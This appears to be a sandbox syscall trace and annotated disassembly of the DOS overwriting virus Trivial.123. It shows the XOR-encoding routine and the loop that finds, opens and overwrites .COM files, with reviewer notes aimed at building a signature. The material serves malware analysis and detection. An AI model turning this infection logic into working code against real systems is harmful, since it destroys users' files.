Sample viewer

vx.netlux.org/Virus.DOS.Trivial.123


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:53.577371451Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Disassembly window following the Get time call. The key byte at [0x109] was set from DL
; on the preceding line (hundredths of a second for DOS Get time), so the key varies per file.
0x12a5d: mov si, 0x112          ; SI = source of the bytes to encode
0x12a60: mov di, 0x185          ; DI = output buffer (ES:DI)
0x12a63: mov cx, 0x69           ; counter 0x69 = 105, the size of the second write in the trace
0x12a66: lodsb al, byte ptr [si]        ; AL = next source byte
0x12a67: xor al, byte ptr [0x109]       ; single-byte XOR with the key
0x12a6b: stosb byte ptr es:[di], al     ; store the encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1             ; exits only once CX wraps past 0, so the body runs 0x6a (106) times
0x12a70: jne 0x12a66
0x12a72: pop ax                 ; function code that was pushed outside this window
0x12a73: xor cx, cx             ; CX = 0 (attribute mask when the call is Find first)
0x12a75: mov dx, 0x175          ; DS:DX = 0x175; presumably the search pattern (every file opened is *.COM) - confirm
0x12a78: int 0x21               ; logged by the trace at PC 12a7a as "Find first file"
0x12a7a: jb 0x12aa3             ; CF set (DOS error, e.g. no match): leave the loop; target is outside this window
0x12a7c: mov ax, 0x3d01         ; AH=0x3d open (trace op 61), AL=01 write access
0x12a7f: mov dx, 0x9e           ; DS:DX = 0x9e; file name in the default DTA (0x80 + 0x1e), assuming the DTA was not moved
0x12a82: int 0x21               ; trace: "Open file"
0x12a84: mov bx, ax             ; handle -> BX; no carry check follows the open in this window
0x12a86: mov ah, 0x40           ; AH=0x40 write (trace op 64); the int 0x21 itself falls outside this window
; NOTE(review): the trace shows open -> write 18 -> write 105 -> close with no read or seek,
; so the start of each host file is overwritten (123 bytes in total). 18 = 0x112 - 0x100, so
; the first write is presumably the unencoded stub that holds the key byte; only that byte
; should differ between copies, which is what a signature can anchor on - confirm on the sample.
2018-12-17T22:49:53.581251159Z 78 PC: 12a7a | Find first file
2018-12-17T22:49:53.587193085Z 61 PC: 12a84 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:49:53.5936878Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.608633788Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.611245968Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.624634713Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Disassembly window following the Get time call. The key byte at [0x109] was set from DL
; on the preceding line (hundredths of a second for DOS Get time), so the key varies per file.
0x12a5d: mov si, 0x112          ; SI = source of the bytes to encode
0x12a60: mov di, 0x185          ; DI = output buffer (ES:DI)
0x12a63: mov cx, 0x69           ; counter 0x69 = 105, the size of the second write in the trace
0x12a66: lodsb al, byte ptr [si]        ; AL = next source byte
0x12a67: xor al, byte ptr [0x109]       ; single-byte XOR with the key
0x12a6b: stosb byte ptr es:[di], al     ; store the encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1             ; exits only once CX wraps past 0, so the body runs 0x6a (106) times
0x12a70: jne 0x12a66
0x12a72: pop ax                 ; function code that was pushed outside this window
0x12a73: xor cx, cx             ; CX = 0
0x12a75: mov dx, 0x175          ; DS:DX = 0x175; presumably the search pattern (every file opened is *.COM) - confirm
0x12a78: int 0x21               ; logged by the trace at PC 12a7a as "Find next file"
0x12a7a: jb 0x12aa3             ; CF set (DOS error, e.g. no more files): leave the loop; target is outside this window
0x12a7c: mov ax, 0x3d01         ; AH=0x3d open (trace op 61), AL=01 write access
0x12a7f: mov dx, 0x9e           ; DS:DX = 0x9e; file name in the default DTA (0x80 + 0x1e), assuming the DTA was not moved
0x12a82: int 0x21               ; trace: "Open file"
0x12a84: mov bx, ax             ; handle -> BX; no carry check follows the open in this window
0x12a86: mov ah, 0x40           ; AH=0x40 write (trace op 64); the int 0x21 itself falls outside this window
; NOTE(review): the trace shows open -> write 18 -> write 105 -> close with no read or seek,
; so the start of each host file is overwritten (123 bytes in total). The 18-byte first write
; is presumably the unencoded stub that holds the key byte - confirm on the sample.
2018-12-17T22:49:53.627289575Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.629841823Z 61 PC: 12a84 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:49:53.636363776Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.642842465Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.64597178Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.653741891Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Disassembly window following the Get time call. The key byte at [0x109] was set from DL
; on the preceding line (hundredths of a second for DOS Get time), so the key varies per file.
0x12a5d: mov si, 0x112          ; SI = source of the bytes to encode
0x12a60: mov di, 0x185          ; DI = output buffer (ES:DI)
0x12a63: mov cx, 0x69           ; counter 0x69 = 105, the size of the second write in the trace
0x12a66: lodsb al, byte ptr [si]        ; AL = next source byte
0x12a67: xor al, byte ptr [0x109]       ; single-byte XOR with the key
0x12a6b: stosb byte ptr es:[di], al     ; store the encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1             ; exits only once CX wraps past 0, so the body runs 0x6a (106) times
0x12a70: jne 0x12a66
0x12a72: pop ax                 ; function code that was pushed outside this window
0x12a73: xor cx, cx             ; CX = 0
0x12a75: mov dx, 0x175          ; DS:DX = 0x175; presumably the search pattern (every file opened is *.COM) - confirm
0x12a78: int 0x21               ; logged by the trace at PC 12a7a as "Find next file"
0x12a7a: jb 0x12aa3             ; CF set (DOS error, e.g. no more files): leave the loop; target is outside this window
0x12a7c: mov ax, 0x3d01         ; AH=0x3d open (trace op 61), AL=01 write access
0x12a7f: mov dx, 0x9e           ; DS:DX = 0x9e; file name in the default DTA (0x80 + 0x1e), assuming the DTA was not moved
0x12a82: int 0x21               ; trace: "Open file"
0x12a84: mov bx, ax             ; handle -> BX; no carry check follows the open in this window
0x12a86: mov ah, 0x40           ; AH=0x40 write (trace op 64); the int 0x21 itself falls outside this window
; NOTE(review): the trace shows open -> write 18 -> write 105 -> close with no read or seek,
; so the start of each host file is overwritten (123 bytes in total). The 18-byte first write
; is presumably the unencoded stub that holds the key byte - confirm on the sample.
2018-12-17T22:49:53.656795498Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.660225759Z 61 PC: 12a84 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:49:53.666603344Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.673242546Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.67690317Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.683277297Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Disassembly window following the Get time call. The key byte at [0x109] was set from DL
; on the preceding line (hundredths of a second for DOS Get time), so the key varies per file.
0x12a5d: mov si, 0x112          ; SI = source of the bytes to encode
0x12a60: mov di, 0x185          ; DI = output buffer (ES:DI)
0x12a63: mov cx, 0x69           ; counter 0x69 = 105, the size of the second write in the trace
0x12a66: lodsb al, byte ptr [si]        ; AL = next source byte
0x12a67: xor al, byte ptr [0x109]       ; single-byte XOR with the key
0x12a6b: stosb byte ptr es:[di], al     ; store the encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1             ; exits only once CX wraps past 0, so the body runs 0x6a (106) times
0x12a70: jne 0x12a66
0x12a72: pop ax                 ; function code that was pushed outside this window
0x12a73: xor cx, cx             ; CX = 0
0x12a75: mov dx, 0x175          ; DS:DX = 0x175; presumably the search pattern (every file opened is *.COM) - confirm
0x12a78: int 0x21               ; logged by the trace at PC 12a7a as "Find next file"
0x12a7a: jb 0x12aa3             ; CF set (DOS error, e.g. no more files): leave the loop; target is outside this window
0x12a7c: mov ax, 0x3d01         ; AH=0x3d open (trace op 61), AL=01 write access
0x12a7f: mov dx, 0x9e           ; DS:DX = 0x9e; file name in the default DTA (0x80 + 0x1e), assuming the DTA was not moved
0x12a82: int 0x21               ; trace: "Open file"
0x12a84: mov bx, ax             ; handle -> BX; no carry check follows the open in this window
0x12a86: mov ah, 0x40           ; AH=0x40 write (trace op 64); the int 0x21 itself falls outside this window
; NOTE(review): the trace shows open -> write 18 -> write 105 -> close with no read or seek,
; so the start of each host file is overwritten (123 bytes in total). The 18-byte first write
; is presumably the unencoded stub that holds the key byte - confirm on the sample.
2018-12-17T22:49:53.685590929Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.688773793Z 61 PC: 12a84 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:49:53.695368019Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.702131298Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.707991996Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.715722625Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Disassembly window following the Get time call. The key byte at [0x109] was set from DL
; on the preceding line (hundredths of a second for DOS Get time), so the key varies per file.
0x12a5d: mov si, 0x112          ; SI = source of the bytes to encode
0x12a60: mov di, 0x185          ; DI = output buffer (ES:DI)
0x12a63: mov cx, 0x69           ; counter 0x69 = 105, the size of the second write in the trace
0x12a66: lodsb al, byte ptr [si]        ; AL = next source byte
0x12a67: xor al, byte ptr [0x109]       ; single-byte XOR with the key
0x12a6b: stosb byte ptr es:[di], al     ; store the encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1             ; exits only once CX wraps past 0, so the body runs 0x6a (106) times
0x12a70: jne 0x12a66
0x12a72: pop ax                 ; function code that was pushed outside this window
0x12a73: xor cx, cx             ; CX = 0
0x12a75: mov dx, 0x175          ; DS:DX = 0x175; presumably the search pattern (every file opened is *.COM) - confirm
0x12a78: int 0x21               ; logged by the trace at PC 12a7a as "Find next file"
0x12a7a: jb 0x12aa3             ; CF set (DOS error, e.g. no more files): leave the loop; target is outside this window
0x12a7c: mov ax, 0x3d01         ; AH=0x3d open (trace op 61), AL=01 write access
0x12a7f: mov dx, 0x9e           ; DS:DX = 0x9e; file name in the default DTA (0x80 + 0x1e), assuming the DTA was not moved
0x12a82: int 0x21               ; trace: "Open file"
0x12a84: mov bx, ax             ; handle -> BX; no carry check follows the open in this window
0x12a86: mov ah, 0x40           ; AH=0x40 write (trace op 64); the int 0x21 itself falls outside this window
; NOTE(review): the trace shows open -> write 18 -> write 105 -> close with no read or seek,
; so the start of each host file is overwritten (123 bytes in total). The 18-byte first write
; is presumably the unencoded stub that holds the key byte - confirm on the sample.
2018-12-17T22:49:53.717899027Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.721042163Z 61 PC: 12a84 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:49:53.728270044Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.734644629Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.738487152Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.747469346Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Disassembly window following the Get time call. The key byte at [0x109] was set from DL
; on the preceding line (hundredths of a second for DOS Get time), so the key varies per file.
0x12a5d: mov si, 0x112          ; SI = source of the bytes to encode
0x12a60: mov di, 0x185          ; DI = output buffer (ES:DI)
0x12a63: mov cx, 0x69           ; counter 0x69 = 105, the size of the second write in the trace
0x12a66: lodsb al, byte ptr [si]        ; AL = next source byte
0x12a67: xor al, byte ptr [0x109]       ; single-byte XOR with the key
0x12a6b: stosb byte ptr es:[di], al     ; store the encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1             ; exits only once CX wraps past 0, so the body runs 0x6a (106) times
0x12a70: jne 0x12a66
0x12a72: pop ax                 ; function code that was pushed outside this window
0x12a73: xor cx, cx             ; CX = 0
0x12a75: mov dx, 0x175          ; DS:DX = 0x175; presumably the search pattern (every file opened is *.COM) - confirm
0x12a78: int 0x21               ; logged by the trace at PC 12a7a as "Find next file"
0x12a7a: jb 0x12aa3             ; CF set (DOS error, e.g. no more files): leave the loop; target is outside this window
0x12a7c: mov ax, 0x3d01         ; AH=0x3d open (trace op 61), AL=01 write access
0x12a7f: mov dx, 0x9e           ; DS:DX = 0x9e; file name in the default DTA (0x80 + 0x1e), assuming the DTA was not moved
0x12a82: int 0x21               ; trace: "Open file"
0x12a84: mov bx, ax             ; handle -> BX; no carry check follows the open in this window
0x12a86: mov ah, 0x40           ; AH=0x40 write (trace op 64); the int 0x21 itself falls outside this window
; NOTE(review): the trace shows open -> write 18 -> write 105 -> close with no read or seek,
; so the start of each host file is overwritten (123 bytes in total). The 18-byte first write
; is presumably the unencoded stub that holds the key byte - confirm on the sample.
2018-12-17T22:49:53.749765946Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.753237532Z 61 PC: 12a84 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:49:53.759852641Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.766290751Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.768334986Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.78560352Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Disassembly window following the Get time call. The key byte at [0x109] was set from DL
; on the preceding line (hundredths of a second for DOS Get time), so the key varies per file.
0x12a5d: mov si, 0x112          ; SI = source of the bytes to encode
0x12a60: mov di, 0x185          ; DI = output buffer (ES:DI)
0x12a63: mov cx, 0x69           ; counter 0x69 = 105, the size of the second write in the trace
0x12a66: lodsb al, byte ptr [si]        ; AL = next source byte
0x12a67: xor al, byte ptr [0x109]       ; single-byte XOR with the key
0x12a6b: stosb byte ptr es:[di], al     ; store the encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1             ; exits only once CX wraps past 0, so the body runs 0x6a (106) times
0x12a70: jne 0x12a66
0x12a72: pop ax                 ; function code that was pushed outside this window
0x12a73: xor cx, cx             ; CX = 0
0x12a75: mov dx, 0x175          ; DS:DX = 0x175; presumably the search pattern (every file opened is *.COM) - confirm
0x12a78: int 0x21               ; logged by the trace at PC 12a7a as "Find next file"
0x12a7a: jb 0x12aa3             ; CF set (DOS error, e.g. no more files): leave the loop; target is outside this window
0x12a7c: mov ax, 0x3d01         ; AH=0x3d open (trace op 61), AL=01 write access
0x12a7f: mov dx, 0x9e           ; DS:DX = 0x9e; file name in the default DTA (0x80 + 0x1e), assuming the DTA was not moved
0x12a82: int 0x21               ; trace: "Open file"
0x12a84: mov bx, ax             ; handle -> BX; no carry check follows the open in this window
0x12a86: mov ah, 0x40           ; AH=0x40 write (trace op 64); the int 0x21 itself falls outside this window
; NOTE(review): the trace shows open -> write 18 -> write 105 -> close with no read or seek,
; so the start of each host file is overwritten (123 bytes in total). The 18-byte first write
; is presumably the unencoded stub that holds the key byte - confirm on the sample.
2018-12-17T22:49:53.787347251Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.789238017Z 61 PC: 12a84 | Open file (Filename = 'PAH.COM')
2018-12-17T22:49:53.795955206Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.802376661Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.805812123Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.814063562Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Disassembly window following the Get time call. The key byte at [0x109] was set from DL
; on the preceding line (hundredths of a second for DOS Get time), so the key varies per file.
0x12a5d: mov si, 0x112          ; SI = source of the bytes to encode
0x12a60: mov di, 0x185          ; DI = output buffer (ES:DI)
0x12a63: mov cx, 0x69           ; counter 0x69 = 105, the size of the second write in the trace
0x12a66: lodsb al, byte ptr [si]        ; AL = next source byte
0x12a67: xor al, byte ptr [0x109]       ; single-byte XOR with the key
0x12a6b: stosb byte ptr es:[di], al     ; store the encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1             ; exits only once CX wraps past 0, so the body runs 0x6a (106) times
0x12a70: jne 0x12a66
0x12a72: pop ax                 ; function code that was pushed outside this window
0x12a73: xor cx, cx             ; CX = 0
0x12a75: mov dx, 0x175          ; DS:DX = 0x175; presumably the search pattern (every file opened is *.COM) - confirm
0x12a78: int 0x21               ; logged by the trace at PC 12a7a as "Find next file"
0x12a7a: jb 0x12aa3             ; CF set (DOS error, e.g. no more files): leave the loop; target is outside this window
0x12a7c: mov ax, 0x3d01         ; AH=0x3d open (trace op 61), AL=01 write access
0x12a7f: mov dx, 0x9e           ; DS:DX = 0x9e; file name in the default DTA (0x80 + 0x1e), assuming the DTA was not moved
0x12a82: int 0x21               ; trace: "Open file"
0x12a84: mov bx, ax             ; handle -> BX; no carry check follows the open in this window
0x12a86: mov ah, 0x40           ; AH=0x40 write (trace op 64); the int 0x21 itself falls outside this window
; NOTE(review): the trace shows open -> write 18 -> write 105 -> close with no read or seek,
; so the start of each host file is overwritten (123 bytes in total). The 18-byte first write
; is presumably the unencoded stub that holds the key byte - confirm on the sample.
2018-12-17T22:49:53.81627412Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.819072831Z 61 PC: 12a84 | Open file (Filename = 'TEST.COM')
2018-12-17T22:49:53.826125486Z 64 PC: 12a91 | Write file or device (Write 18 bytes on handle 5)
2018-12-17T22:49:53.82911533Z 64 PC: 12a9a | Write file or device (Write 105 bytes on handle 5)
2018-12-17T22:49:53.831740614Z 62 PC: 12a9e | Close file
2018-12-17T22:49:53.840370496Z 44 PC: 12a59 | Get time
0x12a59: mov byte ptr [0x109], dl
; Disassembly window following the Get time call. The key byte at [0x109] was set from DL
; on the preceding line (hundredths of a second for DOS Get time), so the key varies per file.
0x12a5d: mov si, 0x112          ; SI = source of the bytes to encode
0x12a60: mov di, 0x185          ; DI = output buffer (ES:DI)
0x12a63: mov cx, 0x69           ; counter 0x69 = 105, the size of the second write in the trace
0x12a66: lodsb al, byte ptr [si]        ; AL = next source byte
0x12a67: xor al, byte ptr [0x109]       ; single-byte XOR with the key
0x12a6b: stosb byte ptr es:[di], al     ; store the encoded byte
0x12a6c: dec cx
0x12a6d: cmp cx, -1             ; exits only once CX wraps past 0, so the body runs 0x6a (106) times
0x12a70: jne 0x12a66
0x12a72: pop ax                 ; function code that was pushed outside this window
0x12a73: xor cx, cx             ; CX = 0
0x12a75: mov dx, 0x175          ; DS:DX = 0x175; presumably the search pattern (every file opened is *.COM) - confirm
0x12a78: int 0x21               ; logged by the trace at PC 12a7a as "Find next file"
0x12a7a: jb 0x12aa3             ; CF set (DOS error, e.g. no more files): leave the loop; target is outside this window
0x12a7c: mov ax, 0x3d01         ; AH=0x3d open (trace op 61), AL=01 write access
0x12a7f: mov dx, 0x9e           ; DS:DX = 0x9e; file name in the default DTA (0x80 + 0x1e), assuming the DTA was not moved
0x12a82: int 0x21               ; trace: "Open file"
0x12a84: mov bx, ax             ; handle -> BX; no carry check follows the open in this window
0x12a86: mov ah, 0x40           ; AH=0x40 write (trace op 64); the int 0x21 itself falls outside this window
; NOTE(review): in this pass the trace records no open after the Find next call; the next
; entry is "Display string" at PC 12aac, consistent with the jb at 0x12a7a being taken once
; no further matching file is found.
2018-12-17T22:49:53.842608946Z 79 PC: 12a7a | Find next file
2018-12-17T22:49:53.844905168Z 9 PC: 12aac | Display string (String= 'T-1000')